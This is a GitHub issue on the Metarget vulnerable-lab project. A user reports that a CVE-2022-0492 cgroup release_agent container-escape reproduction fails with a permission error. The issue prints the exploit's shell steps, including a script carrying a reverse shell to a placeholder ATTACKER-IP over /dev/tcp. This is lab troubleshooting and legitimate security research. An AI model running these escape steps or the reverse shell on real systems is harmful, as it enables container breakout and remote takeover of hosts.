search

Metarget / metarget

Metarget is a framework providing automatic constructions of vulnerable infrastructures.
Apache License 2.0
1.05k stars 163 forks source link

CVE-2022-0492 cannot work #121

Open tarihub opened 11 months ago

tarihub commented 11 months ago

install cve-2022-0492

./metarget cnv install cve-2022-0492 --verbose

after reboot

uname -a
Linux metarget2 5.8.0-050800rc1-generic #202007141143 SMP Tue Jul 14 11:45:39 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux

enter container and run exp

root@metarget2:~# docker run -it --security-opt apparmor=unconfined --security-opt seccomp=unconfined --rm ubuntu /bin/bash
root@869a1bb7f76d:/# unshare -UrmC bash
root@869a1bb7f76d:/# mount -it cgroup -o rdma cgroup /mnt
root@869a1bb7f76d:/# d=/mnt
root@869a1bb7f76d:/# mkdir -p $d/w;echo 1 >$d/w/notify_on_release
root@869a1bb7f76d:/# printf '#!/bin/bash\n/bin/bash -i >& /dev/tcp/ATTACKER-IP/4444 0>&1' > /exp.sh; chmod 777 /exp.sh
root@869a1bb7f76d:/# t=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
root@869a1bb7f76d:/# echo "$t/exp.sh" > $d/release_agent
bash: /mnt/release_agent: Permission denied

failed in bash: /mnt/release_agent: Permission denied

other info